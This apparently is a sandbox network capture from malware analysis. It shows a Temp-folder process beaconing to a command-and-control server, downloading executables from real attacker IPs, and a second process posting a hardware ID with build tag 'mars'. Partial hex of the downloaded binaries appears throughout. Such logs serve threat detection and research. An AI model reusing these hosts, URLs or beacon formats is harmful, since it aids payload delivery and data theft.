Nov 12, 2024 00:07:19.589385986 CET	1236	IN	Data Raw: dc 59 f4 c8 dc 5c cb 41 53 aa f8 48 81 aa fb 49 9e 28 f6 1b 48 fb 1f 53 73 ef 59 6c 1d a8 70 1c 3d d1 a1 6c 09 e9 a9 6c c1 6d 59 1e 86 aa e9 78 18 16 77 92 2f 2f 71 dc 3c 6a 70 34 3d ae 7d c0 88 d6 7d c0 88 d6 7d c0 88 55 1b 4c 07 ee c9 46 d8 bf Data Ascii: Y\ASHI(HSsYlp=llmYxw//q<jp4=}}}ULF0lg3J,Jp4=VTu=p=NJ@PJe.GCf$>PfjLfwew=^D2Y'Mv=Np=lP.}M=`EUgp}dJH'pX`S_g?v'wp<=^u<=u
Nov 12, 2024 00:07:19.589405060 CET	1236	IN	Data Raw: 1e ef 0b cd 64 42 22 34 3d 56 72 0c 3d 96 76 0c 3d 52 72 0c 3d fe 76 0c 3d 6e 72 0c 3d a2 76 0c 3d 6a 72 0c 3d b6 76 4c 3d ef 59 6c 31 0e 09 7f 19 66 48 8c 34 eb 0d dc 00 e7 b1 6c 01 e6 cd 50 19 ef 59 6c 09 2c 8a 6c 25 66 0b 0c 3d be cd e0 2b e6 Data Ascii: dB"4=Vr=v=Rr=v=nr=v=jr=vL=Yl1fH4lPYl,l%f=+AlfEBF=n6^JRo=JJf]PJPfJJikP\|fP(/=n1?Rf.0Y~pSffJ>llU\|XSDYJIUH
Nov 12, 2024 00:07:19.594294071 CET	1236	IN	Data Raw: 28 01 7e c0 88 d6 7d c0 88 d6 7d c0 88 d6 7d c0 88 2c ca 78 29 a9 86 ba 93 7d cf b8 87 10 97 ba 65 68 76 8a 9d 7f f6 22 0c 2d ce 60 29 b6 9d 89 d8 6a 9d 60 29 b6 48 90 00 e9 0f 58 93 71 77 93 85 82 e9 70 84 5a 98 c5 dc 4a fd 1b 5f e4 f5 cb 5d 4f Data Ascii: (~}}},x)}ehv"-`)j`)HXqwpZJ_]OJulvBRwYl1l J}}lS\|<DwR{J^O']Yl1qJqvl vIX3lS\|<lS\|<gp=ZrlUPJ

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.5	50271	185.215.113.43	80	9164	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 00:07:22.813626051 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 35 36 34 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1005642001&unit=246122658369
Nov 12, 2024 00:07:23.416623116 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 11 Nov 2024 23:07:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.5	50276	185.215.113.16	80	9164	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 00:07:23.427331924 CET	56	OUT	GET /steam/random.exe HTTP/1.1 Host: 185.215.113.16
Nov 12, 2024 00:07:24.072231054 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 11 Nov 2024 23:07:23 GMT Content-Type: application/octet-stream Content-Length: 1815040 Last-Modified: Mon, 11 Nov 2024 22:52:56 GMT Connection: keep-alive ETag: "67328ac8-1bb200" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ce ac e2 38 8a cd 8c 6b 8a cd 8c 6b 8a cd 8c 6b e5 bb 27 6b 92 cd 8c 6b e5 bb 12 6b 87 cd 8c 6b e5 bb 26 6b b0 cd 8c 6b 83 b5 0f 6b 89 cd 8c 6b 83 b5 1f 6b 88 cd 8c 6b 0a b4 8d 6a 89 cd 8c 6b 8a cd 8d 6b d1 cd 8c 6b e5 bb 23 6b 98 cd 8c 6b e5 bb 11 6b 8b cd 8c 6b 52 69 63 68 8a cd 8c 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 4f c3 2f 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 40 22 00 00 00 00 00 00 b0 69 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 e0 69 00 00 04 00 00 66 58 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$8kkk'kkkk&kkkkkkjkkk#kkkkRichkPELO/g@"i@ifX@M$a$ $b@.rsrc $r@.idata $r@ *$t@xxdbzcjj Ov@txsnlhpzi@.taggant0i"@
Nov 12, 2024 00:07:24.072248936 CET	212	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 12, 2024 00:07:24.072268963 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 12, 2024 00:07:24.072283030 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 12, 2024 00:07:24.072293997 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 12, 2024 00:07:24.072316885 CET	1236	IN	Data Raw: 25 07 03 18 36 bb 61 c7 31 b7 70 df bb 6f 2c d6 7d 57 46 6f b5 48 e2 ee 25 ad 9d d2 61 ff 38 89 45 89 d8 8c 1d 9f c4 6b 1c 8f a2 60 4d 87 53 73 35 9f fb 8f b3 87 6f 91 6d ef 2c 80 44 91 79 20 33 db e1 01 d7 d3 41 21 d6 c2 d8 3f 7b 8b c8 18 7c c8 Data Ascii: %6a1po,}WFoH%a8Ek`MSs5om,Dy 3A!?{\|5c[&y`n( 2(D}+@%<AVY:g$7}cRes=_}b*@/f]73_A 0~S({fIM_
Nov 12, 2024 00:07:24.072329044 CET	1236	IN	Data Raw: 01 b2 5b 9f c0 f0 21 b2 51 0d 67 10 36 6a 13 a3 76 9e cf 38 cf e3 96 9f 2d 99 8f 9d 8b 1c 3c 5f 8d 52 00 00 35 0a 60 87 91 57 18 1c cd 90 c5 f4 70 ca 02 03 6d 8b 1a 90 18 81 8c 11 b2 b9 24 92 99 52 c7 61 b1 c2 ac 84 71 2b 21 db 8d 5d bc 09 6b bd Data Ascii: [!Qg6jv8-<_R5`Wpm$Raq+!]kb!ZcfHCwG+}@:;uJ];\|vLO~f2p"RwXG\|"1]r]Rc5JbS3pz,K8)H;?^ "=}&4&yZh
Nov 12, 2024 00:07:24.072341919 CET	1236	IN	Data Raw: a1 8a 38 99 1d 36 28 6f 35 a3 bf a1 af 8a a9 36 8e 55 2a b7 4c 2b c1 a0 b0 84 21 cf 6d 87 98 1c 12 1e db a2 75 ef 2c f7 4b b6 b0 6e 0d 66 e1 13 bd ef 40 d5 4b db 10 c7 b0 1e d6 98 7f c0 68 13 4c f3 3e ab b8 55 cd a3 ba 9f a0 20 7a eb 3e 93 b8 8e Data Ascii: 86(o56UL+!mu,Knf@KhL>U z>$xd9,&q6xl <D'B25?MYKp\{oI(p/W_fzbFq`JL,sU/S$x*M(:r43'</sW]w(S?'
Nov 12, 2024 00:07:24.072354078 CET	1236	IN	Data Raw: 6c 1f 73 d5 39 b0 3e 8f b6 b3 d4 7c 42 7e 11 72 15 a3 2a 75 ad 1a d1 61 86 bf d0 81 7f 77 38 c3 6c 45 20 d5 15 67 2a d5 b9 bf c0 d5 7f 9d 3c 9c 34 b7 2a d5 9d bf 10 d5 1b e3 2f f6 8c 3f c1 88 a9 86 30 9f 06 1d ff 83 7f b0 c0 81 75 37 dc 5c 4f 26 Data Ascii: ls9>\|B~ruaw8lE g<4/?0u7\O&!;6y(G7>.X!R\5PVDR8LUqeSHpE?v,_LlaL9`U@./9F<.,g62d5sx-JKyUq
Nov 12, 2024 00:07:24.072367907 CET	1236	IN	Data Raw: 69 0f c1 81 9d 87 24 1d b6 ea 16 fb ba 0f f2 c7 95 8e b0 fe 86 93 29 33 8d 0a 3b ef 4b 43 40 7a b1 1e 55 df 4b df 9c d6 0d bf 9c cf 19 2f 19 b8 58 cf 23 81 5c 9f 70 18 ce 35 af 43 16 ef 2a 75 15 a0 3e 53 b6 55 94 d0 ae 4f dc 62 59 37 2d 0f b7 1e Data Ascii: i$)3;KC@zUK/X#\p5C*u>SUObY7-)647kW\|7Ml1 g'Nolu-?9-fGXZ8;TsFD3m`L;rG} [x+4Lj$Y;K'-"5x<)\|rA>
Nov 12, 2024 00:07:24.077290058 CET	1236	IN	Data Raw: 81 85 db dc 8e d6 01 1b 7e 9b 09 86 49 3b db c3 78 3c 21 81 41 86 3c 9f d5 36 c1 0c 36 84 90 ff bc 81 c0 9f 19 53 95 ab b7 86 9b 95 1c 02 01 88 69 86 34 d5 78 71 11 71 1c 6d 1e 81 a1 87 dc 1b b5 47 18 8e cd 44 9f 82 bf 5f 3d ff 35 bb c6 d1 38 f5 Data Ascii: ~I;x<!A<66Si4xqqmGD_=58}\|-]6-63({A9+-pL%/^S}cLqu-mj#C5K8$sQ4[wOlK7\-#LF9f

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.5	50287	185.215.113.43	80	9164	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 00:07:27.122350931 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 35 36 34 33 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1005643001&unit=246122658369
Nov 12, 2024 00:07:27.764700890 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 11 Nov 2024 23:07:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.5	50288	185.215.113.16	80	9164	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 00:07:28.116734982 CET	140	OUT	GET /steam/random.exe HTTP/1.1 Host: 185.215.113.16 If-Modified-Since: Mon, 11 Nov 2024 22:52:56 GMT If-None-Match: "67328ac8-1bb200"
Nov 12, 2024 00:07:28.754168987 CET	192	IN	HTTP/1.1 304 Not Modified Server: nginx/1.18.0 (Ubuntu) Date: Mon, 11 Nov 2024 23:07:28 GMT Last-Modified: Mon, 11 Nov 2024 22:52:56 GMT Connection: keep-alive ETag: "67328ac8-1bb200"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.5	50289	185.215.113.206	80	5264	C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 00:07:28.598050117 CET	90	OUT	GET / HTTP/1.1 Host: 185.215.113.206 Connection: Keep-Alive Cache-Control: no-cache
Nov 12, 2024 00:07:29.252567053 CET	203	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 23:07:29 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 12, 2024 00:07:29.259001970 CET	412	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FIDHIEBAAKJDHIECAAFH Host: 185.215.113.206 Content-Length: 210 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 46 49 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 30 43 36 45 43 41 31 33 38 39 41 32 39 31 39 33 31 34 35 38 0d 0a 2d 2d 2d 2d 2d 2d 46 49 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 46 49 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 2d 2d 0d 0a Data Ascii: ------FIDHIEBAAKJDHIECAAFHContent-Disposition: form-data; name="hwid"80C6ECA1389A291931458------FIDHIEBAAKJDHIECAAFHContent-Disposition: form-data; name="build"mars------FIDHIEBAAKJDHIECAAFH--
Nov 12, 2024 00:07:29.461144924 CET	210	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 23:07:29 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 8 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 59 6d 78 76 59 32 73 3d Data Ascii: YmxvY2s=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.5	50291	185.215.113.43	80	9164	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 00:07:30.551542044 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 35 36 34 34 30 33 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1005644031&unit=246122658369
Nov 12, 2024 00:07:31.194858074 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 11 Nov 2024 23:07:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.5	50293	185.215.113.16	80	9164	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 00:07:31.207501888 CET	54	OUT	GET /off/random.exe HTTP/1.1 Host: 185.215.113.16
Nov 12, 2024 00:07:31.945916891 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 11 Nov 2024 23:07:31 GMT Content-Type: application/octet-stream Content-Length: 2786816 Last-Modified: Mon, 11 Nov 2024 22:51:27 GMT Connection: keep-alive ETag: "67328a6f-2a8600" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 00 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 2b 00 00 04 00 00 cc cc 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@z!L!This program cannot be run in DOS mode.$PELP(,e"0$+ `@ @+`Ui` @ @.rsrc`2@.idata 8@yficgynw@&:@ryhifnco `@.taggant@+"d@
Nov 12, 2024 00:07:31.945933104 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 12, 2024 00:07:31.945945024 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 12, 2024 00:07:31.945955992 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 12, 2024 00:07:31.945967913 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 12, 2024 00:07:31.945979118 CET	1060	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 12, 2024 00:07:31.945991039 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 12, 2024 00:07:31.946002007 CET	1236	IN	Data Raw: ed 86 b6 1b 95 9e c1 1b bb d8 bb 32 bd 95 29 2d c7 94 d6 89 d3 bd d8 36 d1 a7 ba 2d 26 95 bc 34 a8 d6 d0 40 86 36 f4 6f c6 9a cf 19 09 63 d5 26 85 98 31 73 f1 63 03 61 ef b6 c2 10 14 30 42 eb 09 82 e5 50 e8 90 bd 42 0d 8f b8 14 28 e7 6b 58 d9 81 Data Ascii: 2)-6-&4@6oc&1sca0BPB(kXKdy1H"!'gVH<ZZ"HS9jY,1'8sOLRAF49_mW}(N>\1NS/3"8fQhv8O,/>)U%
Nov 12, 2024 00:07:31.946012974 CET	1236	IN	Data Raw: be 3d 49 1b 6d a5 f1 1e 1b b1 b9 ae 60 0d 5c 5f fa 90 99 28 0b 5e fa 17 d6 be 3f 5f 83 a0 cf 2b 51 7a c7 2b 2d bd 11 2c d3 34 ef 32 39 ad f6 6f 2d 5d f0 5f c2 4d ba 8f 52 81 ff 87 fb 9a af d4 cf 6d f0 af 6d 58 47 63 d3 9a f7 2c 3e 1d c4 46 72 7a Data Ascii: =Im`\_(^?_+Qz+-,429o-]_MRmmXGc,>Frza+LBoPq}Mvl8,'5)2k 0j7hX@v(F>kXT\Y9<OS~OvhFmN_fsdHnzOBB!=\|>Mf
Nov 12, 2024 00:07:31.946022034 CET	36	IN	Data Raw: ba 4f 26 8c fe 61 c7 17 51 99 97 cf 04 76 96 10 32 83 96 b8 17 c7 11 78 e6 f4 9b 1f 15 3e ae 24 fb 59 a6 93 Data Ascii: O&aQv2x>$Y
Nov 12, 2024 00:07:31.950850964 CET	1236	IN	Data Raw: b1 5f ef 36 fd 6d 85 f7 d2 8c 42 49 d3 46 ae 83 19 3b d1 62 ff 4b 7f 2c 02 82 8f 32 1e 64 05 05 50 1b f1 07 4e 8c 83 8b 2b 0f b1 1c cf 55 2b 4b c7 90 08 84 ee 13 7f 8b 19 c2 53 7a a7 c9 13 85 0f ae c9 71 b4 f4 53 2b 57 9c 40 d3 13 4e d2 18 25 52 Data Ascii: _6mBIF;bK,2dPN+U+KSzqS+W@N%R*0\|AzdT"]#`P_41s\gc_4gI^#0aovp"}1no'$-^cS@sE?oeen;)k+-z{_3t

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.5	50295	185.215.113.43	80	9164	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 00:07:35.562360048 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 35 36 34 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1005645001&unit=246122658369
Nov 12, 2024 00:07:36.193240881 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 11 Nov 2024 23:07:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.5	50299	185.215.113.43	80	9164	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 00:07:38.048151970 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 12, 2024 00:07:38.609687090 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 11 Nov 2024 23:07:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.5	50300	185.215.113.16	80	8836	C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 00:07:38.202064037 CET	205	OUT	GET /steam/random.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: 185.215.113.16
Nov 12, 2024 00:07:38.841182947 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 11 Nov 2024 23:07:38 GMT Content-Type: application/octet-stream Content-Length: 1815040 Last-Modified: Mon, 11 Nov 2024 22:52:56 GMT Connection: keep-alive ETag: "67328ac8-1bb200" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ce ac e2 38 8a cd 8c 6b 8a cd 8c 6b 8a cd 8c 6b e5 bb 27 6b 92 cd 8c 6b e5 bb 12 6b 87 cd 8c 6b e5 bb 26 6b b0 cd 8c 6b 83 b5 0f 6b 89 cd 8c 6b 83 b5 1f 6b 88 cd 8c 6b 0a b4 8d 6a 89 cd 8c 6b 8a cd 8d 6b d1 cd 8c 6b e5 bb 23 6b 98 cd 8c 6b e5 bb 11 6b 8b cd 8c 6b 52 69 63 68 8a cd 8c 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 4f c3 2f 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 40 22 00 00 00 00 00 00 b0 69 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 e0 69 00 00 04 00 00 66 58 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$8kkk'kkkk&kkkkkkjkkk#kkkkRichkPELO/g@"i@ifX@M$a$ $b@.rsrc $r@.idata $r@ *$t@xxdbzcjj Ov@txsnlhpzi@.taggant0i"@
Nov 12, 2024 00:07:38.841206074 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 12, 2024 00:07:38.841217995 CET	224	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 12, 2024 00:07:38.841228008 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 12, 2024 00:07:38.841240883 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
